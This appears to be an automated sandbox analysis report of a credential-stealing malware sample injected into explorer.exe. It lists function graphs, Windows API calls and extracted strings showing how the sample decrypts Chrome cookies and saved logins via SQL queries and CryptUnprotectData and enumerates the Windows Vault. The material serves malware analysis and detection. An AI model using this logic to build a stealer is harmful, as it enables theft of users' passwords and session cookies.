28317->28302 28318->28305 28319->28281 28320->28288 28321->28292 28322->28283 28323->28271 28502 f072d 19 API calls 28403 d0128 23 API calls 28503 ccb2a _allmul _allmul 28405 c9925 18 API calls 28506 d7b3d 18 API calls 28165 c413e 28166 c4045 50 API calls 28165->28166 28167 c414e 28166->28167 28507 10c322 27 API calls 28509 d0f3e 51 API calls 28408 d9534 40 API calls 28409 ef130 22 API calls 28512 dff32 21 API calls 28513 df74d 18 API calls 28514 e6340 83 API calls 28411 ee141 18 API calls 28412 ca558 18 API calls 28413 ee558 22 API calls 28414 f5d6f 20 API calls 28415 da16f 34 API calls 28518 cab68 20 API calls 28520 e7f67 25 API calls 28522 f7762 memset memset memcpy 28417 dc97b memcpy 28324 c2f77 28325 c2e30 22 API calls 28324->28325 28326 c2f9a 28325->28326 28327 c2e30 22 API calls 28326->28327 28328 c2fab 28327->28328 28420 e7d8b _allrem memcpy 28523 dab8b 19 API calls 28526 c1b9d GetFileAttributesW 28421 c1198 GetProcessHeap RtlAllocateHeap CryptBinaryToStringA CryptBinaryToStringA 28527 cbf9a _alldiv 28422 dfd97 19 API calls 28528 e13ca 79 API calls 28530 dcb91 18 API calls 28532 1033b7 27 API calls 28533 e8ba6 7 API calls 28425 d11a0 34 API calls 28426 e9dbc 25 API calls 28534 e13ca 80 API calls 28535 1053ad memset memcpy memset memcpy 27927 c9fc8 27928 c9fd3 27927->27928 27930 c9fd8 27927->27930 27929 c9ff4 HeapCreate 27929->27928 27931 ca004 27929->27931 27930->27928 27930->27929 27933 c7f70 17 API calls 27931->27933 27933->27928 28539 e13ca 80 API calls 28540 f73c4 22 API calls 28086 c15dd 28087 c1600 28086->28087 28088 c15f3 lstrlen 28086->28088 28097 c1000 GetProcessHeap RtlAllocateHeap 28087->28097 28088->28087 28090 c1608 lstrcat 28091 c163d lstrcat 28090->28091 28092 c1644 28090->28092 28091->28092 28098 c1333 28092->28098 28095 c1011 3 API calls 28096 c1667 28095->28096 28097->28090 28121 c1000 GetProcessHeap RtlAllocateHeap 28098->28121 28100 c1357 28122 c106c lstrlen MultiByteToWideChar 28100->28122 28102 c1366 28123 c12a3 RtlZeroMemory 28102->28123 28105 c13b8 RtlZeroMemory 28109 c13ed 28105->28109 28106 c1011 3 API calls 28107 c15d2 28106->28107 28107->28095 28108 c15b5 28108->28106 28109->28108 28125 c1000 GetProcessHeap RtlAllocateHeap 28109->28125 28111 c14a7 wsprintfW 28112 c14c9 28111->28112 28120 c15a1 28112->28120 28126 c1000 GetProcessHeap RtlAllocateHeap 28112->28126 28113 c1011 3 API calls 28113->28108 28115 c159a 28118 c1011 3 API calls 28115->28118 28116 c1533 28116->28115 28127 c104c VirtualAlloc 28116->28127 28118->28120 28119 c158a RtlMoveMemory 28119->28115 28120->28113 28121->28100 28122->28102 28124 c12c5 28123->28124 28124->28105 28124->28108 28125->28111 28126->28116 28127->28119 28128 c63dd 28131 cb87b 28128->28131 28129 c63f4 28132 cb88d memset 28131->28132 28136 cb8e5 28132->28136 28136->28132 28137 cba3c 28136->28137 28138 cb965 CreateFileW 28136->28138 28141 cba14 28136->28141 28142 cba41 28136->28142 28147 cb609 28136->28147 28150 cb828 28136->28150 28154 cb64b 18 API calls 28136->28154 28155 cbb9f 18 API calls 28136->28155 28156 ca2aa 17 API calls 28136->28156 28137->28129 28138->28136 28157 ca1c6 18 API calls 28141->28157 28159 1152ae _allmul 28142->28159 28144 cba32 28158 114db2 17 API calls 28144->28158 28160 ca08a 28147->28160 28149 cb60f 28149->28136 28151 cb842 GetFileAttributesExW 28150->28151 28152 cb852 28151->28152 28153 cb861 28151->28153 28152->28151 28152->28153 28153->28136 28154->28136 28155->28136 28156->28136 28157->28144 28158->28137 28159->28137 28161 ca0a4 28160->28161 28163 ca0aa 28161->28163 28164 c6a81 memset 28161->28164 28163->28149 28164->28163 28198 c43d9 28205 c4317 _alloca_probe RegOpenKeyW 28198->28205 28201 c4317 25 API calls 28202 c43f5 28201->28202 28203 c4317 25 API calls 28202->28203 28204 c4403 28203->28204 28206 c43cf 28205->28206 28207 c4343 RegEnumKeyExW 28205->28207 28206->28201 28208 c436d 28207->28208 28209 c43c4 RegCloseKey 28207->28209 28210 c1953 6 API calls 28208->28210 28211 c199d 9 API calls 28208->28211 28213 c1011 3 API calls 28208->28213 28216 c418a 28208->28216 28209->28206 28210->28208 28211->28208 28214 c439b RegEnumKeyExW 28213->28214 28214->28208 28215 c43c3 28214->28215 28215->28209 28217 c430d 28216->28217 28224 c41a3 28216->28224 28217->28208 28218 c19e5 9 API calls 28218->28224 28220 c4205 wsprintfW 28221 c1011 3 API calls 28220->28221 28221->28224 28222 c1011 GetProcessHeap HeapFree VirtualQuery 28222->28224 28224->28217 28224->28218 28224->28222 28225 c17c0 9 API calls 28224->28225 28226 c1000 GetProcessHeap RtlAllocateHeap 28224->28226 28227 c1fce GetProcessHeap HeapFree VirtualQuery CryptUnprotectData RtlMoveMemory 28224->28227 28225->28224 28226->28220 28227->28224 28541 cebd9 24 API calls 28429 113dc8 24 API calls 28432 cc9ea _allmul _alldiv 28435 c99e1 strncmp 28436 cb1e3 24 API calls 28544 e7be1 30 API calls 28237 c47fa 28244 c479c 28237->28244 28240 c479c 23 API calls 28241 c4813 28240->28241 28242 c479c 23 API calls 28241->28242 28243 c481f 28242->28243 28245 c1afe 10 API calls 28244->28245 28246 c47af 28245->28246 28247 c47f1 28246->28247 28248 c199d 9 API calls 28246->28248 28247->28240 28249 c47bf 28248->28249 28250 c47ea 28249->28250 28252 c1d4a 18 API calls 28249->28252 28251 c1011 3 API calls 28250->28251 28251->28247 28252->28249 28437 1155eb IsProcessorFeaturePresent 28438 cd1f7 memset _allmul _allmul 28439 c49f1 13 API calls 28547 e13ca 63 API calls 28548 d9ff0 33 API calls

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 0 c3717-c3730 call c1b6a 3 c3736-c374c 0->3 4 c3c37-c3c3d 0->4 5 c374e-c3757 call c302d 3->5 6 c3762-c379c call c1000 GetTempPathW GetTempFileNameW DeleteFileW CopyFileW 3->6 9 c375c-c375e 5->9 11 c379e-c37a3 call c349b 6->11 12 c37a8-c37b5 call 114bec 6->12 9->6 11->12 16 c37bb-c37d3 call feeb8 12->16 17 c3c15-c3c1e DeleteFileW call c1011 12->17 22 c3c0c-c3c10 call 113848 16->22 23 c37d9-c37f1 call c1000 call e02ec 16->23 21 c3c23-c3c28 17->21 21->4 24 c3c2a-c3c32 call c2ffa 21->24 22->17 31 c37f7 23->31 32 c3bd0-c3be3 call dfb92 lstrlen 23->32 24->4 34 c37fc-c3816 call c1fa7 31->34 37 c3c05-c3c07 call c1011 32->37 38 c3be5-c3c00 call c1798 * 3 32->38 41 c381c-c382d 34->41 42 c3bb6-c3bc6 call e02ec 34->42 37->22 38->37 46 c3a37-c3a51 CryptUnprotectData 41->46 47 c3833-c3843 RtlCompareMemory 41->47 42->34 52 c3bcc 42->52 46->42 49 c3a57-c3a5c 46->49 47->46 51 c3849-c384b 47->51 49->42 53 c3a62-c3a78 call c1fa7 49->53 51->46 55 c3851-c3856 51->55 52->32 62 c3a7a-c3a80 53->62 63 c3a86-c3a9d call c1fa7 53->63 55->46 56 c385c-c3861 55->56 56->46 59 c3867-c38ed RtlZeroMemory call c1000 56->59 73 c3a2e-c3a32 59->73 74 c38f3-c3909 call c1fa7 59->74 62->63 66 c3a82 62->66 68 c3a9f-c3aa5 63->68 69 c3aab-c3ac2 call c1fa7 63->69 66->63 68->69 71 c3aa7 68->71 79 c3ac4-c3aca 69->79 80 c3ad0-c3aed call c1fa7 69->80 71->69 77 c3bb1 call c1011 73->77 83 c390b-c3911 74->83 84 c3917-c392d call c1fa7 74->84 77->42 79->80 82 c3acc 79->82 90 c3aef-c3af1 80->90 91 c3af7-c3b01 80->91 82->80 83->84 86 c3913 83->86 94 c392f-c3935 84->94 95 c393b-c3952 call c1fa7 84->95 86->84 90->91 96 c3af3 90->96 92 c3b0f-c3b1b lstrlen 91->92 93 c3b03-c3b05 91->93 92->42 99 c3b21-c3b2a lstrlen 92->99 93->92 97 c3b07-c3b0b 93->97 94->95 100 c3937 94->100 103 c3954-c395a 95->103 104 c3960-c3979 call c1fa7 95->104 96->91 97->92 99->42 102 c3b30-c3b4f call c1000 99->102 100->95 110 c3b59-c3b93 call c2112 wsprintfA lstrlen 102->110 111 c3b51 102->111 103->104 106 c395c 103->106 112 c397b-c3981 104->112 113 c3987-c3993 lstrlen 104->113 106->104 118 c3b95-c3ba1 call c102f 110->118 119 c3ba3-c3baf lstrcat 110->119 111->110 112->113 115 c3983 112->115 113->73 117 c3999-c39a2 lstrlen 113->117 115->113 117->73 120 c39a8-c39c7 call c1000 117->120 118->119 119->77 125 c39c9 120->125 126 c39d1-c3a0b call c2112 wsprintfA lstrlen 120->126 125->126 129 c3a0d-c3a19 call c102f 126->129 130 c3a1b-c3a29 lstrcat call c1011 126->130 129->130 130->73
                                                        APIs
                                                          • Part of subcall function 000C1B6A: CreateFileW.KERNELBASE(00000000,00000080,00000000,00000000,00000003,00000000,00000000), ref: 000C1B82
                                                          • Part of subcall function 000C1B6A: CloseHandle.KERNEL32(00000000), ref: 000C1B8F
                                                        • GetTempPathW.KERNEL32(00000104,00000000), ref: 000C3778
                                                        • GetTempFileNameW.KERNELBASE(00000000,00000000,00000000,00000000), ref: 000C3782
                                                        • DeleteFileW.KERNELBASE(00000000), ref: 000C3789
                                                        • CopyFileW.KERNEL32(?,00000000,00000000), ref: 000C3794
                                                        • RtlCompareMemory.NTDLL(00000000,?,00000003), ref: 000C383B
                                                        • RtlZeroMemory.NTDLL(?,00000040), ref: 000C3870
                                                        • lstrlen.KERNEL32(?,?,?,?,?), ref: 000C398B
                                                        • lstrlen.KERNEL32(00000000), ref: 000C399A
                                                        • wsprintfA.USER32 ref: 000C39F1
                                                        • lstrlen.KERNEL32(00000000,?,?), ref: 000C39FD
                                                        • lstrcat.KERNEL32(00000000,?), ref: 000C3A21
                                                        • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 000C3A49
                                                        • lstrlen.KERNEL32(?,00000000,00000000,00000000,00000000), ref: 000C3B13
                                                        • lstrlen.KERNEL32(00000000), ref: 000C3B22
                                                        • wsprintfA.USER32 ref: 000C3B79
                                                        • lstrlen.KERNEL32(00000000), ref: 000C3B85
                                                        • lstrcat.KERNEL32(00000000,?), ref: 000C3BA9
                                                        • lstrlen.KERNEL32(00000000,?,?,?,00000000,00000000,?), ref: 000C3BDA
                                                        • DeleteFileW.KERNELBASE(00000000,00000000,?), ref: 000C3C16
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.514536871.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_19_2_c1000_explorer.jbxd
                                                        Similarity
                                                        • API ID: lstrlen$File$DeleteMemoryTemplstrcatwsprintf$CloseCompareCopyCreateCryptDataHandleNamePathUnprotectZero
                                                        • String ID: %sTRUE%s%s%s%s%s$0$COOKIES$FALSE$SELECT host_key,path,is_secure,name,encrypted_value FROM cookies$TRUE$v1
                                                        • API String ID: 584740257-404540950
                                                        • Opcode ID: a23d138301e79af16bee3357f0eaa08dc63fc4c2289d2a28b577019bb06831f8
                                                        • Instruction ID: c2bd5664ae81c03ce275280e3603a140813cffa0008f9f19c02a5d8c1c7d7917
                                                        • Opcode Fuzzy Hash: a23d138301e79af16bee3357f0eaa08dc63fc4c2289d2a28b577019bb06831f8
                                                        • Instruction Fuzzy Hash: 40E19870218341AFD725DF24C984FAFBBE9AF89344F04882CF585862A2DB76CD45CB52

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 134 c2198-c21c9 RtlZeroMemory GetVersionExW 135 c21cb-c21d0 134->135 136 c21d7-c21dc 134->136 137 c21de 135->137 138 c21d2 135->138 136->137 139 c21e3-c21f6 LoadLibraryW 136->139 137->139 138->136 140 c21fc-c223e GetProcAddress * 5 139->140 141 c249b-c24a3 139->141 142 c2244-c224a 140->142 143 c2492-c249a FreeLibrary 140->143 142->143 144 c2250-c2252 142->144 143->141 144->143 145 c2258-c225a 144->145 145->143 146 c2260-c2265 145->146 146->143 147 c226b-c2277 146->147 148 c227e-c2280 147->148 148->143 149 c2286-c22a5 148->149 151 c248b-c248f 149->151 152 c22ab-c22b3 149->152 151->143 153 c22b9-c22c5 152->153 154 c2483 152->154 155 c22c9-c22db 153->155 154->151 156 c2365-c2375 RtlCompareMemory 155->156 157 c22e1-c22f1 RtlCompareMemory 155->157 158 c237b-c23c9 call c1953 * 3 156->158 159 c2452-c2475 156->159 157->159 160 c22f7-c2348 call c1953 * 3 157->160 176 c23cb-c23dc call c1953 158->176 177 c23e4-c23ea 158->177 159->155 163 c247b-c247f 159->163 160->177 178 c234e-c2363 call c1953 160->178 163->154 190 c23e0 176->190 181 c23ec-c23ee 177->181 182 c2431-c2433 177->182 178->190 187 c242a-c242c call c1011 181->187 188 c23f0-c23f2 181->188 184 c243c-c243e 182->184 185 c2435-c2437 call c1011 182->185 192 c2447-c2449 184->192 193 c2440-c2442 call c1011 184->193 185->184 187->182 188->187 194 c23f4-c23f6 188->194 190->177 192->159 197 c244b-c244d call c1011 192->197 193->192 194->187 196 c23f8-c2406 StrStrIW 194->196 198 c2408-c2421 call c17c0 * 3 196->198 199 c2426 196->199 197->159 198->199 199->187
                                                        APIs
                                                        • RtlZeroMemory.NTDLL(?,00000114), ref: 000C21AF
                                                        • GetVersionExW.KERNEL32(?), ref: 000C21BE
                                                        • LoadLibraryW.KERNEL32(vaultcli.dll), ref: 000C21E8
                                                        • GetProcAddress.KERNEL32(00000000,VaultOpenVault), ref: 000C220A
                                                        • GetProcAddress.KERNEL32(00000000,VaultCloseVault), ref: 000C2214
                                                        • GetProcAddress.KERNEL32(00000000,VaultEnumerateItems), ref: 000C2220
                                                        • GetProcAddress.KERNEL32(00000000,VaultGetItem), ref: 000C222A
                                                        • GetProcAddress.KERNEL32(00000000,VaultFree), ref: 000C2236
                                                        • RtlCompareMemory.NTDLL(?,00121110,00000010), ref: 000C22E8
                                                        • RtlCompareMemory.NTDLL(?,00121110,00000010), ref: 000C236C
                                                          • Part of subcall function 000C1953: lstrlenW.KERNEL32(?,00000000,00000000,?,?,000C2F0C), ref: 000C1973
                                                          • Part of subcall function 000C1953: lstrlenW.KERNEL32(00116564,?,?,000C2F0C), ref: 000C1978
                                                          • Part of subcall function 000C1953: lstrcatW.KERNEL32(00000000,?), ref: 000C1990
                                                          • Part of subcall function 000C1953: lstrcatW.KERNEL32(00000000,00116564), ref: 000C1994
                                                        • StrStrIW.SHLWAPI(?,Internet Explorer), ref: 000C23FE
                                                        • FreeLibrary.KERNELBASE(00000000), ref: 000C2493
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.514536871.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_19_2_c1000_explorer.jbxd
                                                        Similarity
                                                        • API ID: AddressProc$Memory$CompareLibrarylstrcatlstrlen$FreeLoadVersionZero
                                                        • String ID: Internet Explorer$VaultCloseVault$VaultEnumerateItems$VaultFree$VaultGetItem$VaultOpenVault$vaultcli.dll
                                                        • API String ID: 2583887280-2831467701
                                                        • Opcode ID: a5e802d1ad2f9820106049f403d1fd165f228156d15865eec1ed5e2a83c9e588
                                                        • Instruction ID: 494c01f336fce24a4fdd702bd81126ed0909a159fbcac44f9df4693bfcb951b3
                                                        • Opcode Fuzzy Hash: a5e802d1ad2f9820106049f403d1fd165f228156d15865eec1ed5e2a83c9e588
                                                        • Instruction Fuzzy Hash: 00919B71A083049FD718DF65C884FAFBBEAAF98304F00882DF98597252EB71D841CB52

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 261 c3098-c30b1 call c1b6a 264 c33ba-c33c0 261->264 265 c30b7-c30cd 261->265 266 c30cf-c30d8 call c302d 265->266 267 c30e3-c3128 call c1000 GetTempPathW GetTempFileNameW DeleteFileW CopyFileW call 114bec 265->267 270 c30dd-c30df 266->270 274 c312e-c3146 call feeb8 267->274 275 c339b-c33a4 DeleteFileW call c1011 267->275 270->267 281 c314c-c3158 call e02ec 274->281 282 c3392-c3396 call 113848 274->282 278 c33a9-c33ab 275->278 278->264 280 c33ad-c33b5 call c2ffa 278->280 280->264 287 c315e-c3161 281->287 288 c3389-c338d call dfb92 281->288 282->275 289 c3165-c317f call c1fa7 287->289 288->282 293 c336f-c337b call e02ec 289->293 294 c3185-c3196 289->294 293->289 303 c3381-c3385 293->303 295 c319c-c31ac RtlCompareMemory 294->295 296 c32cd-c32e7 CryptUnprotectData 294->296 295->296 299 c31b2-c31b4 295->299 296->293 298 c32ed-c32f2 296->298 298->293 301 c32f4-c330a call c1fa7 298->301 299->296 302 c31ba-c31bf 299->302 308 c330c-c3312 301->308 309 c3318-c332f call c1fa7 301->309 302->296 305 c31c5-c31ca 302->305 303->288 305->296 307 c31d0-c3253 RtlZeroMemory call c1000 305->307 319 c32bd 307->319 320 c3255-c326b call c1fa7 307->320 308->309 311 c3314 308->311 315 c333d-c3343 309->315 316 c3331-c3337 309->316 311->309 321 c3345-c334b 315->321 322 c3351-c336a call c1798 * 3 315->322 316->315 318 c3339 316->318 318->315 326 c32c1-c32c8 call c1011 319->326 330 c326d-c3273 320->330 331 c3279-c328e call c1fa7 320->331 321->322 323 c334d 321->323 322->293 323->322 326->293 330->331 334 c3275 330->334 339 c329c-c32bb call c1798 * 3 331->339 340 c3290-c3296 331->340 334->331 339->326 340->339 341 c3298 340->341 341->339
                                                        APIs
                                                          • Part of subcall function 000C1B6A: CreateFileW.KERNELBASE(00000000,00000080,00000000,00000000,00000003,00000000,00000000), ref: 000C1B82
                                                          • Part of subcall function 000C1B6A: CloseHandle.KERNEL32(00000000), ref: 000C1B8F
                                                        • GetTempPathW.KERNEL32(00000104,00000000), ref: 000C30F9
                                                        • GetTempFileNameW.KERNELBASE(00000000,00000000,00000000,00000000), ref: 000C3103
                                                        • DeleteFileW.KERNELBASE(00000000), ref: 000C310A
                                                        • CopyFileW.KERNEL32(?,00000000,00000000), ref: 000C3115
                                                        • RtlCompareMemory.NTDLL(00000000,00000000,00000003), ref: 000C31A4
                                                        • RtlZeroMemory.NTDLL(?,00000040), ref: 000C31D7
                                                        • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 000C32DF
                                                        • DeleteFileW.KERNELBASE(00000000,00000000,?), ref: 000C339C
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.514536871.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_19_2_c1000_explorer.jbxd
                                                        Similarity
                                                        • API ID: File$DeleteMemoryTemp$CloseCompareCopyCreateCryptDataHandleNamePathUnprotectZero
                                                        • String ID: 0$@$SELECT origin_url,username_value,password_value FROM logins$v1
                                                        • API String ID: 2757140130-4052020286
                                                        • Opcode ID: 9b5e622c8af8dc7c20ce1d0d89dc6463935831b3a1ebc8c8ffe9238c8f9a14fd
                                                        • Instruction ID: 7d893e13d2ced862851d02a0f1a8131389b44376dc6ecc335188d734be133e5c
                                                        • Opcode Fuzzy Hash: 9b5e622c8af8dc7c20ce1d0d89dc6463935831b3a1ebc8c8ffe9238c8f9a14fd
                                                        • Instruction Fuzzy Hash: C2919A31218381ABDB149F24C844FAFBBE9AFC5744F04892CF58596292DB35DE45CB52

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 348 c3ed9-c3ee7 349 c3eed-c3ef1 348->349 350 c3fd1-c3fdb 348->350 349->350 351 c3ef7-c3f21 call c1000 PathCombineW FindFirstFileW 349->351 354 c3fca-c3fcc call c1011 351->354 355 c3f27-c3f30 351->355 354->350 356 c3f78-c3f86 lstrcmpiW 355->356 357 c3f32-c3f40 lstrcmpiW 355->357 359 c3faf-c3fbd FindNextFileW 356->359 360 c3f88-c3fa3 call c1000 PathCombineW call c3e04 356->360 357->359 361 c3f42-c3f54 lstrcmpiW 357->361 359->355 363 c3fc3-c3fc4 FindClose 359->363 369 c3fa8-c3faa call c1011 360->369 361->359 364 c3f56-c3f76 call c1000 PathCombineW call c3ed9 361->364 363->354 364->369 369->359
                                                        APIs
                                                          • Part of subcall function 000C1000: GetProcessHeap.KERNEL32(00000008,?,000C11C7,?,?,00000001,00000000,?), ref: 000C1003
                                                          • Part of subcall function 000C1000: RtlAllocateHeap.NTDLL(00000000), ref: 000C100A
                                                        • PathCombineW.SHLWAPI(00000000,00000000,*.*), ref: 000C3F0A
                                                        • FindFirstFileW.KERNELBASE(00000000,?,?,00000000), ref: 000C3F16
                                                        • lstrcmpiW.KERNEL32(?,001162CC), ref: 000C3F38
                                                        • lstrcmpiW.KERNEL32(?,001162D0), ref: 000C3F4C
                                                        • PathCombineW.SHLWAPI(00000000,00000000,?), ref: 000C3F69
                                                        • lstrcmpiW.KERNEL32(?,Local State), ref: 000C3F7E
                                                        • PathCombineW.SHLWAPI(00000000,00000000,?), ref: 000C3F9B
                                                        • FindNextFileW.KERNELBASE(00000000,00000010), ref: 000C3FB5
                                                        • FindClose.KERNELBASE(00000000), ref: 000C3FC4
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.514536871.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_19_2_c1000_explorer.jbxd
                                                        Similarity
                                                        • API ID: CombineFindPathlstrcmpi$FileHeap$AllocateCloseFirstNextProcess
                                                        • String ID: *.*$Local State
                                                        • API String ID: 3923353463-3324723383
                                                        • Opcode ID: ab88cef545f067dfd720b654878eacb926dbb06126caee591de0847e53fa4195
                                                        • Instruction ID: 426f7e9a24056e881f0cc7fd89408b911b13c3a2952814074d4836fd1ca5a86e
                                                        • Opcode Fuzzy Hash: ab88cef545f067dfd720b654878eacb926dbb06126caee591de0847e53fa4195
                                                        • Instruction Fuzzy Hash: 6121B0306003447BD758AB709C48FEF76BC9BC6341F14893DF816C2193EBBA8A898661

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 373 c1d4a-c1d5c 374 c1eb4-c1ebe 373->374 375 c1d62-c1d66 373->375 375->374 376 c1d6c-c1d77 call c19b4 375->376 379 c1d79-c1d89 call c1953 376->379 380 c1d8b-c1d97 call c1953 376->380 385 c1d9b-c1d9d 379->385 380->385 385->374 386 c1da3-c1db4 FindFirstFileW 385->386 387 c1ead-c1eaf call c1011 386->387 388 c1dba 386->388 387->374 390 c1dbe-c1dc3 388->390 391 c1e3d-c1e6a call c1953 call c199d lstrcmpiW 390->391 392 c1dc5-c1dd7 lstrcmpiW 390->392 403 c1e6c-c1e75 call c1cf7 391->403 404 c1e87-c1e89 call c1011 391->404 394 c1ddd-c1def lstrcmpiW 392->394 395 c1e8e-c1e9c FindNextFileW 392->395 394->395 398 c1df5-c1e00 call c19b4 394->398 395->390 396 c1ea2-c1ea9 FindClose 395->396 396->387 405 c1e09 398->405 406 c1e02-c1e07 398->406 403->404 412 c1e77-c1e7f 403->412 404->395 407 c1e0b-c1e3b call c1953 call c199d call c1d4a 405->407 406->407 407->404 412->404
                                                        APIs
                                                          • Part of subcall function 000C19B4: lstrlenW.KERNEL32(00000000,00000000,00000000,000C2CAF,00000000,00000000,?,?,00000000,PathToExe,00000000,00000000), ref: 000C19C4
                                                        • FindFirstFileW.KERNELBASE(00000000,?,?,00000000), ref: 000C1DA9
                                                        • lstrcmpiW.KERNEL32(?,001162CC), ref: 000C1DCF
                                                        • lstrcmpiW.KERNEL32(?,001162D0), ref: 000C1DE7
                                                        • lstrcmpiW.KERNEL32(?,?), ref: 000C1E62
                                                          • Part of subcall function 000C1CF7: lstrlenW.KERNEL32(00000000,00000000,00000000,000C2C27), ref: 000C1D02
                                                          • Part of subcall function 000C1CF7: RtlComputeCrc32.NTDLL(00000000,00000000,00000000), ref: 000C1D0D
                                                        • FindNextFileW.KERNELBASE(00000000,00000010), ref: 000C1E94
                                                        • FindClose.KERNELBASE(00000000), ref: 000C1EA3
                                                          • Part of subcall function 000C1953: lstrlenW.KERNEL32(?,00000000,00000000,?,?,000C2F0C), ref: 000C1973
                                                          • Part of subcall function 000C1953: lstrlenW.KERNEL32(00116564,?,?,000C2F0C), ref: 000C1978
                                                          • Part of subcall function 000C1953: lstrcatW.KERNEL32(00000000,?), ref: 000C1990
                                                          • Part of subcall function 000C1953: lstrcatW.KERNEL32(00000000,00116564), ref: 000C1994
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.514536871.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_19_2_c1000_explorer.jbxd
                                                        Similarity
                                                        • API ID: lstrlen$Findlstrcmpi$Filelstrcat$CloseComputeCrc32FirstNext
                                                        • String ID: *.*$\*.*
                                                        • API String ID: 232625764-1692270452
                                                        • Opcode ID: 73d8dc3d6c0756faaac33e2ea4124b07e13a18aa3c3ad6d5eea046e5b962ee9e
                                                        • Instruction ID: 18202571e4568279dd00b231e5bad336ff062d80cfc7ef8d9098c242816cd79d
                                                        • Opcode Fuzzy Hash: 73d8dc3d6c0756faaac33e2ea4124b07e13a18aa3c3ad6d5eea046e5b962ee9e
                                                        • Instruction Fuzzy Hash: A931A2307083419BDB64EB749998FEF76EA9FC6340F004A2DF84AC2253EB758C459652

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 483 c3e04-c3e11 call c1b6a 486 c3ed4-c3ed8 483->486 487 c3e17-c3e22 call c1c31 483->487 487->486 490 c3e28-c3e34 call c2fb1 487->490 493 c3ec8-c3ecc 490->493 494 c3e3a-c3e4f call c123b 490->494 493->486 497 c3ec0-c3ec7 call c1011 494->497 498 c3e51-c3e58 494->498 497->493 499 c3ebf 498->499 500 c3e5a-c3e6a 498->500 499->497 502 c3e6c-c3e7c RtlCompareMemory 500->502 503 c3eb8-c3eba call c1011 500->503 502->503 505 c3e7e-c3ea6 CryptUnprotectData 502->505 503->499 505->503 507 c3ea8-c3ead 505->507 507->503 508 c3eaf-c3eb3 507->508 508->503
                                                        APIs
                                                          • Part of subcall function 000C1B6A: CreateFileW.KERNELBASE(00000000,00000080,00000000,00000000,00000003,00000000,00000000), ref: 000C1B82
                                                          • Part of subcall function 000C1B6A: CloseHandle.KERNEL32(00000000), ref: 000C1B8F
                                                          • Part of subcall function 000C1C31: CreateFileW.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 000C1C46
                                                          • Part of subcall function 000C1C31: GetFileSize.KERNEL32(00000000,00000000,00000000,?,000C3FA8), ref: 000C1C56
                                                          • Part of subcall function 000C1C31: ReadFile.KERNELBASE(00000000,00000000,00000000,?,00000000), ref: 000C1C76
                                                          • Part of subcall function 000C1C31: CloseHandle.KERNEL32(00000000), ref: 000C1C91
                                                          • Part of subcall function 000C2FB1: StrStrIA.SHLWAPI(00000000,"encrypted_key":"), ref: 000C2FC1
                                                          • Part of subcall function 000C2FB1: lstrlen.KERNEL32("encrypted_key":",?,000C3FA8), ref: 000C2FCE
                                                          • Part of subcall function 000C2FB1: StrStrIA.SHLWAPI("encrypted_key":",0011692C), ref: 000C2FDD
                                                          • Part of subcall function 000C123B: lstrlen.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,000C3E4B,00000000), ref: 000C124A
                                                          • Part of subcall function 000C123B: CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 000C1268
                                                          • Part of subcall function 000C123B: CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 000C1295
                                                        • RtlCompareMemory.NTDLL(00000000,IDPAP,00000005), ref: 000C3E74
                                                        • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 000C3E9E
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.514536871.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_19_2_c1000_explorer.jbxd
                                                        Similarity
                                                        • API ID: File$Crypt$BinaryCloseCreateHandleStringlstrlen$CompareDataMemoryReadSizeUnprotect
                                                        • String ID: $DPAP$DPAP$IDPAP
                                                        • API String ID: 3076719866-957854035
                                                        • Opcode ID: a9c82f26caf97995f8626c96db9c6bf7fa19aba58068d31497b6a4d2f78f6b2d
                                                        • Instruction ID: 1247902a791fece0136aa602f9ff097b9321c40bf4286bc784f5f2b7437e54bc
                                                        • Opcode Fuzzy Hash: a9c82f26caf97995f8626c96db9c6bf7fa19aba58068d31497b6a4d2f78f6b2d
                                                        • Instruction Fuzzy Hash: 9D2181726143456BD725EB688C80FFFB2EDAB95700F44492DF841C7282EB74CE498796

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
